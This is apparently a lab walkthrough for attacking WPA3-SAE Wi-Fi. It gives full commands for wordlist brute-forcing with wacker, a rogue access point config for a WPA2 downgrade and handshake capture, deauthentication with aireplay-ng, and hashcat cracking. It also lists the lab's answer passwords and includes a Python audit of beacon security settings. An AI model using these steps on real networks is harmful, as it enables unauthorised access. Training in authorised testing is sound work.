SAE WPA3


Last updated 4 months ago

13. What is the wifi-management password?

In WPA3 networks it is still possible to brute-force the password until it is found; to do this we can use “wacker”.

sudo ./wacker.py --wordlist ~/10-million-password-list-top-100000.txt --ssid wifi-management --bssid F0:9F:C2:11:0A:24 --interface wlan2 --freq 2462

chocolate1

14. What is the wifi-IT password?

If a network with WPA3 SAE has a client configured for WPA2/WPA3, we can perform a downgrade against the client, forcing it to connect to our rogue AP with WPA2 and obtaining the handshake to crack later, as in the case of wifi-offices. In this case we can see that the AP uses both SAE and PSK, so the clients may accept PSK too. We can get this information from the airodump-ng “.csv” file.

hostapd-sae.conf

interface=wlan1
driver=nl80211
hw_mode=g
channel=11
ssid=wifi-IT
mana_wpaout=hostapd-management.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

This is a Hostapd configuration file used to set up a fake access point (AP) for penetration testing purposes. Here’s a breakdown of each line:


1️⃣ Interface & Driver Configuration

interface=wlan1
driver=nl80211
  • interface=wlan1 → Specifies that wlan1 is the wireless network interface to be used for hosting the fake AP.

  • driver=nl80211 → Uses the nl80211 driver, which is common for modern Linux-based wireless devices.


2️⃣ Wireless Mode & Channel Selection

hw_mode=g
channel=11
  • hw_mode=g → Sets the 802.11g standard, which operates on the 2.4 GHz band and supports speeds up to 54 Mbps.

  • channel=11 → Specifies Channel 11 (2462 MHz) for the AP.


3️⃣ SSID & WPA Handshake Capture

ssid=wifi-IT
mana_wpaout=hostapd-management.hccapx
  • ssid=wifi-IT → This is the SSID (Wi-Fi network name) that the AP will broadcast.

  • mana_wpaout=hostapd-management.hccapx → Captures WPA handshakes and saves them in the HCCAPX format, which is used for offline password cracking with Hashcat.


4️⃣ WPA Security Settings

wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
  • wpa=2 → Configures WPA2 encryption (stronger than WPA1).

  • wpa_key_mgmt=WPA-PSK → Uses Pre-Shared Key (PSK) authentication.

  • wpa_pairwise=TKIP CCMP → Supports both TKIP (legacy) and CCMP (AES-based, stronger encryption).

  • wpa_passphrase=12345678 → Sets the Wi-Fi password to 12345678.


What This Configuration Does

✅ Creates a fake Wi-Fi network named "wifi-IT" on channel 11 (2.462 GHz).
✅ Uses WPA2-PSK encryption with the password "12345678".
✅ Captures WPA handshakes in HCCAPX format for cracking later.
✅ Uses the wlan1 interface with the nl80211 driver.

hostapd-mana hostapd-sae.conf

We can check whether the AP has MFP (802.11w) enabled with Wireshark:

In this case 802.11w is disabled, so we can deauth:

# In this case 802.11w is disabled so we can deauth
iwconfig wlan0mon channel 11
aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25 -c 10:F9:6F:AC:53:52

And you will be able to capture the handshake.
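The two conditions this attack path depends on (the AP offering SAE and PSK together, as seen in the airodump-ng .csv, and 802.11w not being required, as checked in Wireshark) are both advertised in the RSN information element of the AP's beacons. The Python below is an added example, not code from the page or from any of the tools it uses: it decodes that element and reports both conditions, so a defender auditing their own WPA3 APs can confirm that MFP is required and that PSK is not offered alongside SAE. The function names and the two sample IEs are my own constructions (LAB_IE mirrors the lab AP described above, HARDENED_IE a WPA3-only AP).

```python
import struct

OUI = b"\x00\x0f\xac"  # IEEE 802.11 suite selectors: this OUI plus a one-byte type
CIPHERS = {2: "TKIP", 4: "CCMP-128", 8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
AKMS = {1: "802.1X", 2: "PSK", 5: "802.1X-SHA256", 6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE"}
MFPR, MFPC = 0x0040, 0x0080  # RSN Capabilities bits 6 (MFP required) and 7 (MFP capable)

def _suite_list(body: bytes, off: int, table: dict) -> tuple:
    # A little-endian 16-bit count followed by that many 4-byte suite selectors
    count, off = struct.unpack_from("<H", body, off)[0], off + 2
    names = []
    for _ in range(count):
        sel = body[off:off + 4]
        names.append(table.get(sel[3], sel.hex()) if sel[:3] == OUI else sel.hex())
        off += 4
    return names, off

def parse_rsn_ie(ie: bytes) -> dict:
    """Decode an RSN information element (element ID 48) as carried in a beacon."""
    if len(ie) < 8 or ie[0] != 0x30 or len(ie) != 2 + ie[1]:
        raise ValueError("not a well-formed RSN IE")
    body = ie[2:]
    group = CIPHERS.get(body[5], body[2:6].hex())
    pairwise, off = _suite_list(body, 6, CIPHERS)
    akm, off = _suite_list(body, off, AKMS)
    caps = struct.unpack_from("<H", body, off)[0] if off + 2 <= len(body) else 0  # optional field
    return {"group": group, "pairwise": pairwise, "akm": akm,
            "mfp_capable": bool(caps & MFPC), "mfp_required": bool(caps & MFPR)}

def assess(rsn: dict) -> list:  # flag the properties the downgrade and deauth steps rely on
    findings = []
    has_sae = any(a in ("SAE", "FT-SAE") for a in rsn["akm"])
    has_psk = any(a in ("PSK", "PSK-SHA256") for a in rsn["akm"])
    if has_sae and has_psk:
        findings.append("TRANSITION_MODE")  # a client may still negotiate WPA2-PSK
    if not rsn["mfp_required"]:
        # Without MFPR, deauth/disassoc frames from at least some clients are unauthenticated
        findings.append("MFP_OPTIONAL" if rsn["mfp_capable"] else "MFP_DISABLED")
    return findings

def build_rsn_ie(group: int, pairwise: list, akm: list, caps: int) -> bytes:
    # Assemble an RSN IE from numeric suite types (used only to construct the samples)
    body = b"\x01\x00" + OUI + bytes([group])
    body += struct.pack("<H", len(pairwise)) + b"".join(OUI + bytes([t]) for t in pairwise)
    body += struct.pack("<H", len(akm)) + b"".join(OUI + bytes([t]) for t in akm)
    body += struct.pack("<H", caps)
    return bytes([0x30, len(body)]) + body

# Constructed samples: LAB_IE mirrors the lab AP (SAE+PSK, 802.11w off), HARDENED_IE a WPA3-only AP
LAB_IE = build_rsn_ie(4, [4], [2, 8], 0)
HARDENED_IE = build_rsn_ie(4, [4], [8], MFPC | MFPR)
```

On a real capture, feed the bytes of the tagged parameter with ID 48 from a beacon frame to parse_rsn_ie; the hostapd settings ieee80211w=2 and wpa_key_mgmt=SAE produce an IE that assess reports as clean.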

Convert the hccapx to a pcap:

hcxhash2cap --hccapx=hostapd-management.hccapx -c aux-management.pcap

Export the hash in hashcat mode 22000 from the pcap:

hcxpcapngtool aux-management.pcap -o hash-management.22000

Crack it outside the VM, or with a newer version of hashcat:

sudo hashcat -a 0 -m 22000 hash-management.22000 ~/10-million-password-list-top-100000.txt --force

bubblegum

https://github.com/blunderbuss-wctf/wacker